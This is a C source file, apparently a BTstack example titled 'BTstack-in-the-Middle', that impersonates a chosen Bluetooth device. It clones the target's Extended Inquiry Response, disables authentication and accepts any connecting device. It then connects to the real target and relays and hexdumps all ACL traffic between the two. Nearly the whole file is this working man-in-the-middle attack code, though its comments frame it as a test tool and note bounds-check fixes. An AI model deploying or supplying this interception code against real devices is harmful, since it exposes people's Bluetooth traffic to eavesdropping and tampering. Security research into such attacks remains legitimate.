/*
* test.c
*
* Created by Matthias Ringwald on 7/14/09.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

#include <btstack/btstack.h>
// Name we advertise while impersonating Bob; spliced into his EIR in place
// of his own "complete local name" record.
#define NAME "BTstack-in-the-Middle"

// Size of the Extended Inquiry Response payload we capture and re-emit.
#define EIR_LEN 240

// ---- Bob: the device we impersonate, learned during inquiry ----------------
bd_addr_t        bob_addr;                       // parsed from argv[1]
uint8_t          bob_EIR[EIR_LEN];               // Bob's EIR records, our own name spliced in
hci_con_handle_t bob_handle = 0;                 // ACL handle of our link to Bob; 0 = not connected
uint16_t         bob_clock_offset = 0;           // paging parameters captured from Bob's inquiry response
uint8_t          bob_page_scan_repetition_mode = 0;
uint8_t          bob_got_EIR = 0;                // set by the packet handler once Bob's EIR was captured
                                                 // (keyed on a vendor-specific record being present)

// ---- Alice: whoever connects to us, believing we are Bob -------------------
hci_con_handle_t alice_handle = 0;               // ACL handle of Alice's link; 0 = not connected

// ---- scratch ----------------------------------------------------------------
bd_addr_t temp_addr;                             // address flipped out of the current event
uint8_t   inquiry_done = 0;                      // inquiry has ended; guards the one-shot EIR install
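// Offset of the EIR data inside the Extended Inquiry Result event, as the
// original code lays the event out: BD_ADDR at [3..8], page scan repetition
// mode at [9], clock offset at [14..15], then EIR_LEN bytes of EIR records.
#define EIR_DATA_OFFSET 17

// Copy the EIR records of Bob's inquiry response into bob_EIR, substituting
// our own name for the "complete local name" record (type 0x09) so that we
// look like Bob in every respect except the name.
//
// eir points at the first EIR length byte, avail is the number of bytes
// readable at eir. Records are [len][type][len-1 data bytes]; a zero length
// byte terminates the list. Every read is bounded by avail and every write by
// EIR_LEN -- the original loop trusted the length bytes of a packet received
// over the air and could both over-read the event and overrun bob_EIR.
//
// Sets bob_got_EIR when a manufacturer-specific record (type 0xff) is seen;
// that flag is what later decides whether the cloned EIR gets installed.
// Returns the number of bytes written to bob_EIR.
static int copy_eir_with_own_name(const uint8_t *eir, int avail){
    const int name_len = (int) strlen(NAME);
    int rd = 0;     // read offset into eir
    int wr = 0;     // write offset into bob_EIR

    memset(bob_EIR, 0, EIR_LEN);
    if (avail > EIR_LEN) avail = EIR_LEN;   // the EIR payload is at most EIR_LEN bytes

    while (rd < avail && eir[rd]) {
        int rec_len = eir[rd] + 1;                 // length byte + type + data
        if (rd + rec_len > avail) break;           // truncated record: stop, do not over-read
        if (eir[rd + 1] == 0x09) {
            // complete local name -- use our own instead of Bob's
            if (wr + 2 + name_len > EIR_LEN) break;
            bob_EIR[wr]     = (uint8_t)(1 + name_len);
            bob_EIR[wr + 1] = 0x09;
            memcpy(&bob_EIR[wr + 2], NAME, (size_t) name_len);
            wr += 2 + name_len;
        } else {
            if (eir[rd + 1] == 0xff) {
                bob_got_EIR = 1;   // vendor-specific record present
            }
            if (wr + rec_len > EIR_LEN) break;     // would overrun bob_EIR
            memcpy(&bob_EIR[wr], &eir[rd], (size_t) rec_len);
            wr += rec_len;
        }
        rd += rec_len;
    }
    return wr;
}

// Called once the inquiry has ended (Inquiry Complete event, or an Inquiry
// Cancel command completing): install Bob's cloned EIR so that we advertise
// as him. Only the first call does anything; inquiry_done guards re-entry.
static void inquiry_finished(void){
    if (inquiry_done) return;
    inquiry_done = 1;
    printf("3. Inquiry Complete\n");
    if (bob_got_EIR){
        printf("4. Set EIR to Bob's.\n");
        bt_send_cmd(&hci_write_extended_inquiry_response, 0, bob_EIR);
    } else {
        // Without Bob's EIR there is nothing to impersonate; say so instead
        // of silently waiting for an Alice who will never come.
        printf("Did not capture BOB's EIR, cannot impersonate BOB.\n");
    }
}

// Central HCI packet handler: relays ACL data between Alice and Bob and
// drives the state machine (configure -> inquiry -> clone EIR -> accept
// Alice -> connect to Bob) from HCI events.
//
// packet_type tells ACL data from events; packet/size is the raw HCI packet
// as delivered by BTstack. Every field read below is checked against size
// first: the packet originates from a remote radio and must not be trusted
// to be well-formed.
void packet_handler(uint8_t packet_type, uint8_t *packet, uint16_t size){
    hci_con_handle_t acl_in;
    hci_con_handle_t acl_out;

    switch (packet_type){

        case HCI_ACL_DATA_PACKET:
            // The HCI ACL header is 4 bytes (handle/flags, data length).
            if (size < 4) break;
            acl_in = READ_ACL_CONNECTION_HANDLE(packet);
            acl_out = 0;
            // A handle of 0 means "not connected yet" for either side (see the
            // globals); data on an unknown handle is dropped, and data for a
            // peer that is not connected yet is dropped too, not queued.
            if (acl_in == alice_handle) {
                printf("Alice: ");
                hexdump( packet, size );
                printf("\n\n");
                acl_out = bob_handle;
            } else if (acl_in == bob_handle) {
                printf("Bob: ");
                hexdump( packet, size );
                printf("\n\n");
                acl_out = alice_handle;
            }
            if (acl_out){
                // Rewrite the 12-bit connection handle, keep the PB/BC flag bits.
                bt_store_16( packet, 0, (READ_BT_16(packet, 0) & 0xf000) | (acl_out & 0x0fff));
                bt_send_acl(packet, size);
            }
            break;

        case HCI_EVENT_PACKET:
            if (size < 2) break;   // event code + parameter length
            switch(packet[0]){

                case BTSTACK_EVENT_STATE:
                    // bt stack activated, get started - set local name
                    if (size < 3) break;
                    if (packet[2] == HCI_STATE_WORKING) {
                        bt_send_cmd(&hci_write_local_name, NAME);
                    }
                    break;

                case HCI_EVENT_EXTENDED_INQUIRY_RESPONSE:
                    // process EIR responses
                    if (size < EIR_DATA_OFFSET + 1) break;   // need the first EIR length byte
                    if (packet[EIR_DATA_OFFSET]) {
                        bt_flip_addr(temp_addr, &packet[3]);
                        if (BD_ADDR_CMP(temp_addr, bob_addr)) {
                            printf("2. Got BOB's EIR. ");
                            int written = copy_eir_with_own_name(&packet[EIR_DATA_OFFSET], size - EIR_DATA_OFFSET);
                            hexdump(bob_EIR, written);
                            printf("\n\n");
                            // paging parameters needed to connect to Bob later
                            bob_clock_offset = READ_BT_16(packet, 14);
                            bob_page_scan_repetition_mode = packet[9];
                        }
                        // The inquiry is allowed to run to completion rather than
                        // cancelled here; inquiry_finished() handles the end.
                    }
                    break;

                case HCI_EVENT_CONNECTION_REQUEST:
                    if (size < 8) break;   // BD_ADDR at [2..7]
                    bt_flip_addr(temp_addr, &packet[2]);
                    if (BD_ADDR_CMP(temp_addr, bob_addr) ){
                        // Bob must not connect to us: we page him ourselves once
                        // Alice is in. The request is simply left unanswered here,
                        // no reject is sent.
                        printf("-> Connection request from BOB. Denying\n");
                    } else {
                        // Anyone else is assumed to be Alice. No check on who the
                        // caller is -- intentional for this test tool.
                        printf("-> Connection request from Alice. Sending Accept\n");
                        bt_send_cmd(&hci_accept_connection_request, &temp_addr, 1);
                    }
                    break;

                case HCI_EVENT_CONNECTION_COMPLETE:
                    if (size < 11) break;  // status [2], handle [3..4], BD_ADDR [5..10]
                    bt_flip_addr(temp_addr, &packet[5]);
                    if (packet[2] == 0){
                        hci_con_handle_t incoming_handle = READ_BT_16(packet, 3);
                        if (BD_ADDR_CMP(temp_addr, bob_addr)){
                            bob_handle = incoming_handle;
                            printf("7. Connected to BOB (handle %u). Relaying data!\n", (unsigned) bob_handle);
                        } else {
                            // Any other completed connection is taken to be Alice;
                            // a later one would silently replace her handle.
                            alice_handle = incoming_handle;
                            printf("6. Alice connected (handle %u). Connecting to BOB.\n", (unsigned) alice_handle);
                            // Page Bob with the parameters captured from his inquiry
                            // response. Bitwise OR: the original wrote `||`, which
                            // collapsed the clock offset argument to the constant 1.
                            // Bit 15 presumably marks the offset as valid.
                            bt_send_cmd(&hci_create_connection, &bob_addr, 0x18, bob_page_scan_repetition_mode, 0, 0x8000 | bob_clock_offset, 0);
                        }
                    } else {
                        printf("Connection complete status %u for connection", packet[2]);
                        print_bd_addr(temp_addr);
                        printf("\n");
                    }
                    break;

                case HCI_EVENT_PIN_CODE_REQUEST:
                    // inform about pin code request
                    printf("Please enter PIN 1234 on remote device\n");
                    break;

                case HCI_EVENT_DISCONNECTION_COMPLETE:
                    // Either baseband link going away ends the test app.
                    // Note: exit() here skips the bt_close() in main().
                    printf("Basebank connection closed, exit.\n");
                    exit(0);
                    break;

                case HCI_EVENT_COMMAND_COMPLETE:
                    // Boot sequence, one command per completion: local name ->
                    // class of device -> authentication -> inquiry mode -> event
                    // mask -> simple pairing -> ACL capture + inquiry.
                    if ( COMMAND_COMPLETE_EVENT(packet, hci_write_local_name) ) {
                        bt_send_cmd(&hci_write_class_of_device, 0x7A020C); // used on iPhone
                    }

                    // 0 = do not require authentication on our links, so Alice
                    // can connect without pairing (original note: "use pairing yes/no").
                    if ( COMMAND_COMPLETE_EVENT(packet, hci_write_class_of_device) ) {
                        bt_send_cmd(&hci_write_authentication_enable, 0);
                    }

                    // allow Extended Inquiry responses
                    if ( COMMAND_COMPLETE_EVENT(packet, hci_write_authentication_enable) ) {
                        bt_send_cmd(&hci_write_inquiry_mode, 2);
                    }

                    // get all events, including EIRs
                    if ( COMMAND_COMPLETE_EVENT(packet, hci_write_inquiry_mode) ) {
                        bt_send_cmd(&hci_set_event_mask, 0xffffffff, 0x1fffffff);
                    }

                    // fine with us, too
                    if ( COMMAND_COMPLETE_EVENT(packet, hci_set_event_mask) ) {
                        bt_send_cmd(&hci_write_simple_pairing_mode, 1);
                    }

                    // start inquiry
                    if ( COMMAND_COMPLETE_EVENT(packet, hci_write_simple_pairing_mode) ) {
                        // enable capture
                        bt_send_cmd(&btstack_set_acl_capture_mode, 1);

                        printf("1. Started inquiry.\n");
                        bt_send_cmd(&hci_inquiry, HCI_INQUIRY_LAP, 15, 0);
                    }

                    // Bob's EIR is installed; nothing more to send, from here on
                    // we wait for Alice's connection request.
                    if ( COMMAND_COMPLETE_EVENT(packet, hci_write_extended_inquiry_response) ) {
                        printf("5. Waiting for Alice!...\n");
                    }

                    // An Inquiry Cancel completing also ends the inquiry. The
                    // original tested this in the default branch below, which a
                    // Command Complete event can never reach.
                    if ( COMMAND_COMPLETE_EVENT(packet, hci_inquiry_cancel) ) {
                        inquiry_finished();
                    }
                    break;

                case HCI_EVENT_INQUIRY_COMPLETE:
                    // Inquiry done, set EIR
                    inquiry_finished();
                    break;

                default:
                    break;
            }
            break;

        default:
            break;
    }
}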
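// Entry point: parse Bob's address from argv[1], bring up BTstack and hand
// control to the run loop; packet_handler() does the rest.
//
// Exit status: 1 on usage error (the original exited 0, which hid the error
// from scripts), bt_open()'s error code if the daemon cannot be reached,
// 0 otherwise.
int main (int argc, const char * argv[]){
    // parse addr of Bob
    uint8_t ok = 0;
    if (argc >= 2) {
        ok = sscan_bd_addr((uint8_t *) argv[1], bob_addr);
    }
    if (!ok) {
        printf("Usage: mitm 12:34:56:78:9A:BC\n");
        return 1;
    }

    // start stack
    run_loop_init(RUN_LOOP_POSIX);
    int err = bt_open();
    if (err) {
        printf("Failed to open connection to BTdaemon\n");
        return err;
    }

    printf("BTstack-in-the-Middle started, will pretend to be BOB (");
    print_bd_addr(bob_addr);
    printf(")\n");

    // all further work happens in packet_handler, driven by the run loop
    bt_register_packet_handler(packet_handler);
    bt_send_cmd(&btstack_set_power_mode, HCI_POWER_ON );
    run_loop_execute();
    bt_close();
    return 0;
}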